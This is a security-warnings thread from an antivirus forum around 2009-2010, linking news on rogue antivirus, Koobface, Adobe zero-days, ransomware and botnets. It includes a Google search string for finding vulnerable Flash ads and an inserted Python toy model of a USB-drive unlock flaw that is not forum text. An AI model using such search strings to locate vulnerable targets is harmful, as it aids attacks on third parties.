-
***
It was suggested that we needed these all in one thread. So, I have created this thread for that use and hope that all will use this thread to post the security warnings on this forum.
Here is a link to the posting that prompted this thread.
http://forum.avast.com/index.php?topic=52250.msg442193#msg442193
***
-
Now we just need a mod to make it a sticky, and we'll be set!
-
If everyone placed the security warnings in here it wouldn't need to be sticky as the activity would keep it high, as is seen with the >> Updates << topic.
I have an aversion for stickies, almost as severe as for toolbars ;D
-
I for one wouldn't mind a sticky for this thread here ;) such a thread is obviously needed and... and thanks to the OP for starting it :)
-
How do you tell if a topic is a sticky?
It sure is easy in Malwarebytes forum:
http://www.malwarebytes.org/forums/index.php?showforum=11
@ DavidR
+1
-
How do you tell if a topic is a sticky?
like that ;D
-
I for one wouldn't mind a sticky for this thread here ;) such a thread is obviously needed and... and thanks to the OP for starting it :)
Sticky isn't needed since this will rise to the top each time an entry is posted which is the same criteria with many other frequent Threads. :)
( missed David's post. :) )
-
i got it, i got it! ;D
nevermind the sticky subject...
-
Rogue antivirus lurks behind Google Doodle searches
http://www.networkworld.com/news/2009/121609-rogue-antivirus-lurks-behind-google.html?t51hb
Five things you need to know about social engineering
The more victims who click links and install the bad guy's software, the more money the criminals make
http://www.pcworld.idg.com.au/article/330130/five_things_need_know_about_social_engineering?fp=4&fpid=776400
-
A lot of malware lurks in Google searches; some even have the brass neck to pay for search placement on specific search words/terms or to buy sponsored links. Google really needs to be more proactive in rooting out possibly malicious/fraudulent sponsored links or search placement.
-
A lot of malware lurks in Google searches; some even have the brass neck to pay for search placement on specific search words/terms or to buy sponsored links. Google really needs to be more proactive in rooting out possibly malicious/fraudulent sponsored links or search placement.
+1.
I use a hosts file, and SpywareBlaster. (Yeah, belts and braces, I know...).
If I'm careless enough to click on any of those Google sponsored results that rise to the top like a pale yellow scum, about 9 times out of 10 my browser cannot connect to the site.
Fine by me.
-
Google sponsored results ??? what's that ??? >>>>>>>>>>>>>>>>> http://adblockplus.org/en/ ;D (or "adthwart" in Chrome)
-
Well there is always the CustomizeGoogle add-on which I use and I never see sponsored ads anyway, my comment was one of caution for others considering the sponsored links.
-
yeah I got CustomizeGoogle as well with ads blocked wherever it's possible. I never mention it because it's set once for all, and I forget about it, while abp allows to block more than what's on the EasyLists, on demand. It's just that ABP has more visibility during the browsing. Sorry for the off topic ;)
-
Just made a topic about this, but thought I would post here too anyway.
Modern Warfare 2 servers hacked, Trojans inserted.
http://www.infinityward.com/forum/viewtopic.php?f=24&t=181646
-
Hi you malware fighters and posters of this thread,
Well, add this link and read the bottom posting there please?
http://forum.avast.com/index.php?topic=52349.msg443049#msg443049
and then add this one as well as a Security Warning:
http://forum.avast.com/index.php?topic=52310.msg442762#msg442762
pol
-
SSL-servers targeted by botherders
Today by polonus
Comments and reactions:
Not only Windows desktops are targeted by botnet herders who want to enlarge their botnets; more and more they will also target FTP, SSL and web servers to be taken over. The hijacked or hacked servers will then often function as a malcode database or be used to forward spam. According to Finnish av vendor F-Secure, FTP servers are the favourite hack target for cybercriminals. "We also saw SSL servers being abused. Sites with a valid SSL certificate get hacked and are then abused for drive-by downloads", according to researcher Mikko Hypponen.
By running a drive-by download over an HTTPS connection, some proxy and gateway scanners cannot scan for malware. "Then it is easier to break into servers", says Hypponen. Server botnets are then formed out of these hacked servers, functioning as a form of sub-botnets. "We now see server botnets. An interesting feature is that these interconnected server botnets are herded by one individual", says Shadowserver Foundation's DiMino. Servers are used to facilitate botnet extension and expansion.
Server-bots
In the meantime we spotted specific server-bots using PHP and Perl to turn servers into realtime spam machines. "The benefit there is the enormous amount of bandwidth and power to maximize the amount of spam sent." According to security expert Marc Maiffret, botherders are recruiting attackers who are experienced server hackers. Maiffret expects legit websites to be the main target for web attacks in 2010 and beyond:
http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml;jsessionid=4RTX0GD0KT3ILQE1GHPSKHWATMY32JVN?articleID=222002433
pol
P.S. If these malserver bots perform a man-in-the-middle attack you can forget SSL security altogether,
D
-
Unless something is seriously done about all these drive by attacks,
the internet as we know it will soon cease to exist. :'(
-
***
Misplaced security warning notice :
http://forum.avast.com/index.php?topic=52307.msg442708#msg442708
***
-
***
Another misplaced security warning :
http://forum.avast.com/index.php?topic=52349.msg443049#msg443049
***
-
China cages game Trojan hackers
(Go directly to jail, do not collect any gold)
http://www.theregister.co.uk/2009/12/17/china_jails_game_trojan_vxers/
-
Film review site hacked to spew malicious PDFs
Hackers on Thursday exploited a vulnerability on Ain't It Cool News that redirected anyone visiting the movie review site to a server containing a malicious Adobe Reader file.
http://www.theregister.co.uk/2009/12/18/aintitcool_malware_attack/
-
Hi malware fighters,
Last week av vendor CA revealed the detection of a botnet inside Amazon's EC2 cloud:
http://community.ca.com/blogs/securityadvisor/archive/2009/12/09/zeus-in-the-cloud.aspx & http://blogs.zdnet.com/security/?p=5110
But according to ScanSafe's Mary Landesman it has already existed for a couple of years.
"In spite of recent messages, distributing malware through Amazon's cloud services is not a new phenomenon. It has been happening since June last year where Amazon's S3 service is concerned and since February 2008 at Amazon's EC2 service", reports Landesman. This totaled up during the last three years to 80 unique malware incidents where Amazon was concerned: 22 incidents took place during 2007, 13 during 2008 and 45 were seen this year. Re: http://blog.scansafe.com/journal/2009/12/17/amazon-cloud-has-rained-malware-before.html
"It is no guarantee for a safe malcode location." Therefore links to the Amazon cloud should be treated extra carefully, just like links to other sources. On the other hand "cloud malware" can be easily halted, as Amazon will not treat this lightly, although they were rather lax in removing it,
polonus
-
Hi CharleyO and all the other malware fighters,
The zero-day hole in Adobe Reader and Acrobat will not be patched before the next patch round in three weeks' time (that is, in the new year), and hackers are now actively abusing it to infect systems.
An out-of-band patch for this critical hole would have a negative impact, according to Adobe's Brad Arkin....
You can be protected here, as Adobe recommends customers follow the mitigation guidance below, utilizing the Adobe Reader and Acrobat JavaScript Blacklist Framework, until a patch is available.
Windows: For end-users on Windows, download the compressed file from here: http://download.macromedia.com/pub/acrobat/updates/APSA09-07_C_Reg_Keys.zip , and double-click on the appropriate registry setting, based on your version of Reader or Acrobat, to populate the JavaScript Blacklist Framework. Adobe will automatically reset the value during the next update.
http://kb2.adobe.com/cps/532/cpsid_53237.html
polonus
-
Unless something is seriously done about all these drive by attacks,
the internet as we know it will soon cease to exist. :'(
*nods* :-\
Don't you think it would be a neat idea, to have anti-virus "bots" with different scan engines running around the internet scanning every website it comes across, and then saving the information and location of the suspicious site. Until Bot 2 with a different engine comes around and confirms what Bot 1 found.
/End day dreaming.
-
Hi Alan|Cvette,
We already have that aboard - the avast webshield is protecting you, and FlashGotters and NoScripters of all lands have been protected against previous, present and future threats from the day FG and NS came around and with Request Policy extensions to top it off, I will browse my Fx or Flock browser with full confidence. And if NS extension would come to Chrome or SRWare's Iron I would use that browser for the additional built in tab "sandbox" security that now has landed also in Firefox 3.7 Minefield. So there is still hope for you and your dream has already been realized, you just have to install it, and then the people of Shadowserver Foundation are working your dream every day: http://www.shadowserver.org/wiki/
I wish you a Merry Christmas and a Happy New Year,
pol
-
Hi Alan|Cvette,
We already have that aboard - the avast webshield is protecting you, and FlashGotters and NoScripters of all lands have been protected against previous, present and future threats from the day FG and NS came around and with Request Policy extensions to top it off, I will browse my Fx or Flock browser with full confidence. And if NS extension would come to Chrome or SRWare's Iron I would use that browser for the additional built in tab "sandbox" security that now has landed also in Firefox 3.7 Minefield. So there is still hope for you and your dream has already been realized, you just have to install it, and then the people of Shadowserver Foundation are working your dream every day: http://www.shadowserver.org/wiki/
I wish you a Merry Christmas and a Happy New Year, pol
I always have my "light bulb" moment a few years too late ;D hahaha. I sure do love Firefox though:
Adblock+
BetterPrivacy
Browser Defender
CS Lite
Finjan
Ghostery
Lastpass
NoScript
WOT
I feel naked browsing in IE without those, IEtab is nice too so I don't have to switch if a website requests I use IE.
I only wish Avast!'s sandboxing would work with my Firefox :-[
---
Iron is pretty cool, I never really use it or Chrome that much though. I'm trying out Google Frame right now which is basically Chrome's best features in Internet Explorer.
Merry Christmas pol!
-
Interesting read:
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
-
Data Doctor 2010 will make you sick (http://boelectronic.blogspot.com/2009/12/data-doctor-2010-will-make-you-sick.html)
Data Doctor 2010 (http://sites.google.com/site/boelectronic/computer/malware/list-of-common-malwares/data-doctor-2010), an encryption trojan via our old "friends" iframedollars. It encrypts the files on your hard drive very rapidly if you’re unfortunate enough to be victimized by it.
-
Facebook is getting worse everyday!! God Damn Koobface!!
Take care about what you are seeing on Facebook, what you click on and what you do. The Koobface worm is growing too fast; I've seen most of my friends get hacked by this nasty worm, and their accounts are sending malware links to their friends via comments on their wall, private messages or chat.
1. More Info: http://boelectronic.blogspot.com/2009/12/facebook-money-mule-or-credit-card.html
2. More Info: http://boelectronic.blogspot.com/2009/12/check-your-friends-facebook-ims-may.html
3. Clicking on the links in my own test (I did in my test machine, I'm not infected!) redirected to... (Screenshot and info in the follow link): http://boelectronic.blogspot.com/2009/12/oh-oh-oh-santa-delivering-fakeav.html
(posts in my blog are collected from other companies blogs).
[I posted that Koobface Sample to avast!, hope avast! detect it soon]
-
definitely staying away from Facebook, I hate it anyway ;D thanks for the heads up ;)...I'll let my friends using it regularly know about the risks, again.
-
I dropped Facebook as soon as they messed with my privacy settings. >:(
-
Facebook user with no problems what so ever.
I have changed all the settings to best suit me and will not accept any application requests, nor do I upload any pictures to any social networking sites.
I don't have any problems using fb.
nmb
-
Facebook user with no problems what so ever.
I have changed all the settings to best suit me and will not accept any application requests, nor do I upload any pictures to any social networking sites.
I don't have any problems using fb.
nmb
+1
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
Don't do Facebook...doesn't MBAM have a Twitter account?
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
Don't do Facebook...doesn't MBAM have a Twitter account?
Follow us on Twitter!
http://www.malwarebytes.org/forums/index.php?showtopic=16338
-
Thank you, YK. ;)
-
Pharma link spammers invade Live Space
http://www.theregister.co.uk/2009/12/23/link_spammers_hit_live_space/
Live.com Exploited as Pharma-Fraud Cover
http://threatcenter.blogspot.com/2009/12/livecom-exploited-as-pharma-fraud-cover.html
-
From Norman Security
Summing up 2009 - predictions for the year to come
http://www.norman.com/security_center/security_center_archive/2009/74565/en
-
***
Misplaced warning :
http://forum.avast.com/index.php?topic=52529.0
***
-
Hi malware fighters,
Latest software of adservers vulnerable: http://forum.openx.org/index.php?showtopic=503454011
8 million vulnerable Flash ads can be googled up: http://www.google.com/search?hl=en&num=100&q=filetype:swf+inurl:clickTAG&aq=f&oq=&aqi=
Cross site scripting attacks are actually being performed: http://kingfeatures.com/pressrm/PR316.htm
and this was done in the past as well: http://www.thetechherald.com/article.php/200952/4979/Funny-pages-used-to-launch-PDF-attack-on-latest-vulnerability
polonus
-
Hi malware fighters,
This year also saw an explosive increase in the number of malware kits, letting everyone construct his own malware within a few mouse clicks. Especially for Christmas time the malcreants launched "Chrismas Stealer" to steal log-in data from Firefox and MSN. Re: http://blog.damballa.com/?p=462
The user just has to fill out his own mail address and that of the victim. The victim will then get an e-mail with an attachment. When this gets opened, the Firefox log-in data and MSN log-in data will be sent to the sender. On the other hand these kits could also dupe the user into losing his own log-in data,
polonus
-
Hi malware fighters,
Malware "horror"scope for 2010 -
All security and av vendors have made predictions for the coming security year 2010. Panda Security, Kaspersky Lab, F-Secure, AVG, RSA, Verizon, Anton Chuvakin, McAfee, Symantec and ESET looked into their crystal balls and came up with the following predictions for 2010.
They sum it up neatly as more of the same, but in larger quantities. But the insights differ.
W 7 and Mac OS X
The introduction of W7 this year is a positive influence according to Finnish F-Secure researchers; XP SP3 will become a malware haven or malware ghetto in regions where W7 is less prevalent. Most av vendors think that when the share of W7 is large enough, this new OS will be attacked too. They foresee this coming within the next two years, according to Panda Security. Malcreants are migrating their malware to the new MS platform and especially to the 64-bit version. Kaspersky believes that the security holes inside the new Windows 7 will result in many drive-by download attacks, also because holes in products like Adobe's and Apple's are being found. Security vendor Verizon has another vision: Windows 7 will be more robust than expected and withstand attacks, so attackers will go for the application software.
Mac OS X will also have the full attention of malcreants. As its market share increases, the number of attacks will grow. “2010 will prove once and for all that Macs aren't immune to exploits”, according to Websense.
Fake-virusscanners
The most remarkable prediction comes from PC Tools. The vendor predicts a trend to combine all existing malware trends with new, inventive techniques. This malware will be more socially interactive and look more reliable and trustworthy to users, like some fake-av programs already do. The next step will be that cyber criminals use their budgets to start their own call centers, helplines, virtual offices and service providers, and even start ad campaigns for their rogue fake av scanners. Furthermore fake av scanners will become more and more aggressive and will even hijack operating systems.
Kaspersky, on the contrary, predicts fewer fake av scanners, because the market is flooded with them already, so less income for the crooks. Also raised attention from intelligence and security services alike makes it harder to spread and create fake av.
Fortinet thinks that the general user is now aware of scareware, so cyber criminals will switch to ransomware during 2010, where they ask money for digital property they have encrypted.
Ads
This year the New York Times was hit by attackers posing as legit advertisers who then placed malicious ads. A successful attack, well worth investing in. Through legitimately bought ads or hacked ad space, users will be attacked in this way during the coming year.
Social engineering
Now that the operating system and applications are becoming more solid and secure, the easiest way to get to people's money or to install malicious software is to socially engineer or mislead them, according to ESET's Randy Abrams. He too thinks that with the coming of W7 malcreants can't easily infect systems. Symantec says social engineering became so popular because it does not matter what OS or what browser is being used; the users themselves are being attacked. “Weak parts on a computer are less important. Social engineering has become one of the prevailing attack methods and this will be the growing trend for 2010.”
Shortened URL-services
Services to shorten URLs have become a trend with Twitter. A big problem there is that the user does not know where they redirect to after clicking the link. The popular URL shortener Bit.ly let us know they will scan better for spam and malcode, but an increase in abuse of these services is expected for the coming new year. Spammers will also use shortened URLs to circumvent spam filters. But the parties involved will protect themselves better, because their business model will be under attack.
Human CAPTCHA-crackers
As spammers find it more and more difficult to break the CAPTCHA codes automatically, they will use human labour in developing economies to create new spam accounts manually, to try and circumvent new detection technologies. Symantec assumes the individuals that manually create the accounts get paid 10% of the overall costs, while account hunters will get 30 to 40 dollars per 1,000 accounts.
DDoS-attack
At least one big distributed denial-of-service (DDoS) attack against some nation, according to F-Secure.
Everyone into the Cloud
The cloud will be the av technology of the days to come, while others now report they have been doing this "for years and years". In 2010 all av vendors will go into the cloud if they aren't already doing so; at least, this is what Spanish Panda Security says. On the other side, cloud services are an interesting target platform for attackers.
A specific service that can expect new attacks is Google Wave. Initially cybercrime will use the service for spreading spam, then it will be abused in phishing attacks, and abusing security holes and spreading malware will follow. Chrome OS will be left alone, while McAfee thinks this will be a hacker's paradise.
Last but not least cyber criminals will hide inside the cloud, like we have seen this recent year.
Cyberwar
For quite some time we have heard about cyberwar and cyber terror, where China and North Korea are mentioned. We saw large-scale DDoS attacks against Estonia and Georgia last year. Govt sites can also come under attack from politically motivated hackers who deface an official website with political slogans. We will see both kinds of attacks during the coming year.
Increase of malware
All av vendors agree that we will encounter more and more vicious malcode during 2010. A lot of av scanners will have a hard time detecting it, predicts Kaspersky Lab. Some vendors will develop complex security software as an answer to this kind of advanced malware, but some malware will be able to circumvent detection, go under the radar and stay immune for quite some time.
Users that do their Internet banking have to watch out for state-of-the-art banking Trojans. The malcreants will then develop geo-located attack versions that are varied according to language and content, so the user will run a higher risk of opening the wrong link. Symantec also expects an increase in English-language spam.
The World Soccer Championships will play an important role for Trojans, fake-ticket business, spam, attacks on legit ticket shops and DDoS attacks.
AVG sees the coming automatic malware generation as one of the biggest problems for 2010, making end-users choose complete security suites over a stand-alone av solution. Then it warns about upcoming economies. The number of users in Brazil, China and India will increase tremendously, but the use of illegal software and the absence of av or fw will create lots of problems. Users will be sitting ducks for attack in the mentioned countries.
Verizon thinks the development of malware will come to a standstill. “Malware won't evolve further.”
Full-disk encryption and NAC
This will not come to fruition and there won't be a breakthrough, says Anton Chuvakin, who predicts that Network Access Control (NAC) will be almost gone near the end of 2010.
Data leaks
In 2009 the biggest leakage of data in human history took place: the theft of over 130 million credit card records at Heartland Payment Systems. The coming year will see more data leakage, but smaller. McAfee focuses on social networking. Fake applications will be a problem for the hundreds of millions that use it, turning their data over to cyber crooks.
China
Will stay at the wrong end of the stick (and stays an interesting role model for others Grin )
Community
The internet community will slowly get educated, according to Verizon. The number of senior users that deal with cybercrime will go down considerably, while young ones teach their generation how to protect themselves, so they will be better informed and able to secure themselves by identifying, finding and defying cyber criminals. After a ten-year period of study, research, coordination and training, cyberpolice will now finally reap the "harvest" of this, according to McAfee.
RSA closed on a positive note: there will be more cooperation between the members of the security community; researchers and vendors alike will cooperate to launch new initiatives.
Well anyway Polonus wishes you all a malware free and solidly secure avast-year 2010!
polonus
-
Good Guys Bring Down the Mega-D Botnet
Chalk up one for the defenders. Here’s how a trio of security researchers used a three-step attack to defeat a 250,000-pronged botnet.
http://www.pcworld.com/article/185122/good_guys_bring_down_the_megad_botnet.html
-
Top 10 tech stories of the decade
http://computerworld.co.nz/news.nsf/tech/E40BE6B4769086A2CC25769A00716FEA
-
***
It was suggested that we needed these all in one thread. So, I have created this thread for that use and hope that all will use this thread to post the security warnings on this forum.
Here is a link to the posting that prompted this thread.
http://forum.avast.com/index.php?topic=52250.msg442193#msg442193
***
I am running Vista Home Premium and when I go into Control Panel/Security it shows I am not running a virus protection program. How do I get this to recognize that I am running Avast Home Edition?
PS: I hope I am posting this in the right place.
-
PS: I hope I am posting this in the right place.
you are not, go here and start a new topic http://forum.avast.com/index.php?board=2.0
-
yeah, he had a security warning ;D ROFL
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
WOW...some people... ::) :o
ComboFix was what fixed my old pc when I first joined...in one swift script :)
Brilliant program (and Dev :))
-
As soon as I get back home, I'll have to remove it from my server. :'(
Edit,
It's now no longer visible. :'(
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
Please DO NOT USE COMBOFIX on your own without supervision!!!
http://www.bleepingcomputer.com/forums/topic273628.html
-
Microsoft releases fix for Windows Vista Black Screen
December 30th, 2009
Microsoft has released a hotfix to resolve an issue where a computer that is running Windows Vista or Windows Server 2008 stops responding at a black screen early in the startup process.
http://www.thewindowsclub.com/microsoft-releases-fix-for-windows-vista-black-screen
-
Hackers actively abuse Symantec business av scanner holes.....
Security leaks in Symantec av scanners for the business market are now being actively abused to download all sorts of nasty malware. http://isc.sans.org/diary.html?storyid=7834
The attacks take place through port 12174 and are aimed at Symantec AntiVirus Corporate Edition, Client Security and Endpoint Security. According to the av vendor they see a dramatic increase in the number of attacks on port 12174. http://www.securityfocus.com/bid/34671/exploit
The update for the four security holes in Alert Management System 2 (AMS2) has been available since April 28 2009, but it seems that some system admins were reluctant to install them. AMS2 is part of the Symantec System Center console, AntiVirus Server, and AntiVirus Central Quarantine Server.
The av vendor advises all firms to close port 12174 and to roll out the updates asap:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20090428_02
polonus
P.S. Wasn't Symantec chosen as the number 1 av recently in a test? Well, ahum...
D.
-
Hi malware fighters,
As reminded by bob3160 posted here also: http://forum.avast.com/index.php?topic=52979.msg449143#msg449143
topic Hexzone, Virut and Pushdo correlations...
pol
-
Hi malware fighters,
Security and threats to the Cloud: http://forum.avast.com/index.php?topic=53036.msg449605#msg449605
polonus
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
Damn, and avast wasn't among the few A/V's that found the infection. I guess we'll have to find the infection somewhere and submit it to alwil soon!
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
Damn, and avast wasn't among the few A/V's that found the infection. I guess we'll have to find the infection somewhere and submit it to alwil soon!
yes, I didn't look at the virus total link in the article.... :o
-
Hi malware fighters,
Threat for website defacements through XSS flaws on blogsites is reported here: http://forum.avast.com/index.php?topic=53082.msg449946#msg449946
polonus
-
Hi malware fighters,
Threat for website defacements through XSS flaws on blogsites is reported here: http://forum.avast.com/index.php?topic=53082.msg449946#msg449946
polonus
So now we have 2 posts for the same item... :)
-
Hi bob3160,
One full posting and one small additional link here. While you alerted for it..
Damian
-
Hi bob3160,
One full posting and one small additional link here. While you alerted for it..
Damian
agree with that, so that those who'd want to comment can go to the other thread and not clutter this one here.
-
Unfortunately that only creates more clutter, so we now create 2 posts instead of one.
It defeats the whole purpose.
At this point, just make your separate posts, it's getting harder and harder to follow all the entries anyway.
-
Unfortunately that only creates more clutter, so we now create 2 posts instead of one.
It defeats the whole purpose.
At this point, just make your separate posts, it's getting harder and harder to follow all the entries anyway.
+1
One post plus comments 8)
One post in SECURITY WARNINGS then 2 topics to follow ::)
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
bob you should have added this too, they didn't crack the algorithm, they used a security flaw in the encryption/decryption program:
The crack relies on a weakness so astoundingly bone-headed that it’s almost hard to believe. While the data on the drive is indeed encrypted using 256-bit crypto, there’s a huge failure in the authentication program. When the correct password is supplied by the user, the authentication program always sends the same character string to the drive to decrypt the data, no matter what password was used. What’s also staggering is that this character string is the same for Kingston, SanDisk and Verbatim USB flash drives.
if they had cracked AES 256, which is hardly likely to happen anytime soon, it would have made the headlines on a few sites and mags ;D ...but well, the program flaw is bad enough to be mentioned.
But there are alternatives, TrueCrypt and now Bitlocker (Windows 7 version) that can be used to encrypt USB drives as well.
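As an added illustration of the flaw Logos quotes above (this is not part of the post or the ZDNet article, and it is neither the vendors' code nor SySS's research), here is a small Python model of the two designs. The drive, host tool, unlock token and sample data are constructed stand-ins; the password-bound version uses PBKDF2 key wrapping as one way to tie the value the drive receives to the password, which is an assumption about the fix rather than anything the vendors shipped.

```python
import hashlib
import hmac
import os

# ---------------------------------------------------------------------------
# Flawed design: the password is verified on the host, and the drive is then
# sent one constant unlock string that does not depend on the password.
# ---------------------------------------------------------------------------

# Constructed stand-in for the shared string the article describes; the real
# value is not on the page and does not matter for the argument.
FIXED_UNLOCK_TOKEN = bytes.fromhex("42" * 32)

SAMPLE_DATA = b"payroll-2009.xlsx (constructed sample)"


class FlawedDrive:
    """Toy drive that releases its data to whoever presents the fixed token."""

    def __init__(self, data: bytes):
        self._data = data
        self._unlocked = False

    def unlock(self, token: bytes) -> bool:
        self._unlocked = hmac.compare_digest(token, FIXED_UNLOCK_TOKEN)
        return self._unlocked

    def read(self) -> bytes:
        if not self._unlocked:
            raise PermissionError("drive is locked")
        return self._data


class FlawedHostTool:
    """Toy host program: checks the password locally, then sends the constant."""

    def __init__(self, drive: FlawedDrive, password: bytes):
        self._drive = drive
        self._pw_hash = hashlib.sha256(password).digest()

    def login(self, password: bytes) -> bool:
        if not hmac.compare_digest(hashlib.sha256(password).digest(), self._pw_hash):
            return False  # the host says no ...
        return self._drive.unlock(FIXED_UNLOCK_TOKEN)  # ... but the drive never learns why


def flawed_design_is_bypassable() -> bool:
    """True if the drive can be read although the host tool rejected the password:
    the password check and the unlock are not bound to each other."""
    drive = FlawedDrive(SAMPLE_DATA)
    tool = FlawedHostTool(drive, b"correct horse battery staple")
    host_rejects = tool.login(b"wrong password") is False
    drive.unlock(FIXED_UNLOCK_TOKEN)  # the only thing the drive ever checks
    return host_rejects and drive.read() == SAMPLE_DATA


# ---------------------------------------------------------------------------
# Password-bound design (assumed fix): the value sent to the drive is derived
# from the password and a per-drive salt, and the drive validates it against a
# wrapped data key. There is no constant that opens every drive.
# ---------------------------------------------------------------------------

def derive_kek(password: bytes, salt: bytes) -> bytes:
    """Key-encryption key from the password (PBKDF2-HMAC-SHA256, per-drive salt)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000, dklen=32)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class BoundDrive:
    """Toy drive: the data key is wrapped under the password-derived key, and
    unlock succeeds only if unwrapping yields the key matching the verifier."""

    def __init__(self, data: bytes, password: bytes):
        self.salt = os.urandom(16)  # public, read by the host tool
        data_key = os.urandom(32)
        self._wrapped_key = _xor(data_key, derive_kek(password, self.salt))
        self._verifier = hmac.new(data_key, b"verify", "sha256").digest()
        self._data = data
        self._unlocked = False

    def unlock(self, kek: bytes) -> bool:
        candidate = _xor(self._wrapped_key, kek)
        check = hmac.new(candidate, b"verify", "sha256").digest()
        self._unlocked = hmac.compare_digest(check, self._verifier)
        return self._unlocked

    def read(self) -> bytes:
        if not self._unlocked:
            raise PermissionError("drive is locked")
        return self._data


class BoundHostTool:
    def __init__(self, drive: BoundDrive):
        self._drive = drive

    def login(self, password: bytes) -> bool:
        return self._drive.unlock(derive_kek(password, self._drive.salt))


def bound_design_outcomes() -> tuple:
    """(fixed token accepted?, wrong password accepted?, right password accepted?)"""
    drive = BoundDrive(SAMPLE_DATA, b"correct horse battery staple")
    tool = BoundHostTool(drive)
    return (
        drive.unlock(FIXED_UNLOCK_TOKEN),
        tool.login(b"wrong password"),
        tool.login(b"correct horse battery staple") and drive.read() == SAMPLE_DATA,
    )


if __name__ == "__main__":
    print("flawed design bypassable:", flawed_design_is_bypassable())
    print("bound design (fixed token, wrong pw, right pw):", bound_design_outcomes())
```

The point the model makes is the one in the quoted paragraph: in the flawed design the drive only ever sees a constant, so the host-side password check protects nothing, and the same constant covers every drive built the same way. In the bound design the drive never sees the password either, but what it does see is a function of it, so a wrong password (or the old constant) fails at the drive, not just at the host. A real product would also encrypt the data under the unwrapped key rather than merely gating reads, which this toy leaves out.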
-
Hacker pierces hardware firewalls with web page
http://forum.avast.com/index.php?topic=53163.msg450630#msg450630
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
Bob, you should have added this too: they didn't crack the algorithm, they used a security flaw in the encryption/decryption program:
The crack relies on a weakness so astoundingly bone-headed that it’s almost hard to believe. While the data on the drive is indeed encrypted using 256-bit crypto, there’s a huge failure in the authentication program. When the correct password is supplied by the user, the authentication program always sends the same character string to the drive to decrypt the data no matter what the password used. What’s also staggering is that this character string is the same for Kingston, SanDisk and Verbatim USB flash drives.
If they had cracked AES 256, which is hardly likely to happen anytime soon, it would have made the headlines on a few sites and mags ;D ...but well, the program flaw is bad enough to be mentioned.
But there are alternatives, TrueCrypt and now BitLocker (Windows 7 version), that can be used to encrypt USB drives as well.
Logos,
I supplied the link which gave that information. :) I spent the time reading it and so did you, so why shouldn't the rest of those that were interested. ;D
-
Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic.
http://www.theregister.co.uk/2010/01/07/juniper_critical_router_bug/
-
And Microsoft Patch on Tuesday.
http://threatpost.com/en_us/blogs/microsoft-plans-quiet-january-patch-tuesday-010710
-
Logos,
I supplied the link which gave that information. :) I spent the time reading it and so did you, so why shouldn't the rest of those that were interested. ;D
The first lines of the article were misleading, and you quoted them, and just them. Here's why... some might NOT read the article but just your post here.
-
Office.Microsoft.Com Search Results Can Lead To Rogue Anti-Virus
Date:01.08.2010
Threat Type: Malicious Web Site / Malicious Code
Websense Security Labs™ ThreatSeeker™ Network has detected that search results on office.microsoft.com can lead users to a Rogue AV page.
http://securitylabs.websense.com/content/Alerts/3519.aspx
-
Some Observations on Rootkits
Getting hit by a live rootkit infection is among the more unfortunate fates that can befall an unsuspecting computer user.
Parting thoughts
• Keep real-time protection enabled
• Run 64-bit Windows
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
-
Hi malware fighters,
Data Doctor is a new encryption cyber crime ransom tool that makes users believe their system does not function properly anymore after letting the OS start up in Safe Mode; one has to pay 63 euro to get access to your data again.
Here is a tool to help you decrypt: http://sunbeltblog.blogspot.com/2010/01/data-doctor-2010-encrypted-files-we.html
polonus
-
Industry group plans Cyber attack Simulation.
http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222200643
-
Hi malware fighters,
Millions and millions of Windows computers run an "unhealthy" kernel, as appeared from a Microsoft survey. The kernel is the heart of the Windows OS and changes to it could have disastrous results. The most favourite technique for a rootkit to hide on a machine is making changes to the kernel. The software vendor wanted to know how many systems were actually rootkitted. "We found that a gigantic amount of computers is running an unhealthy kernel", according to MS Malware Protection Center's Randy Treit. 1% of all tested computers, that means millions of machines for the whole of the Windows population.
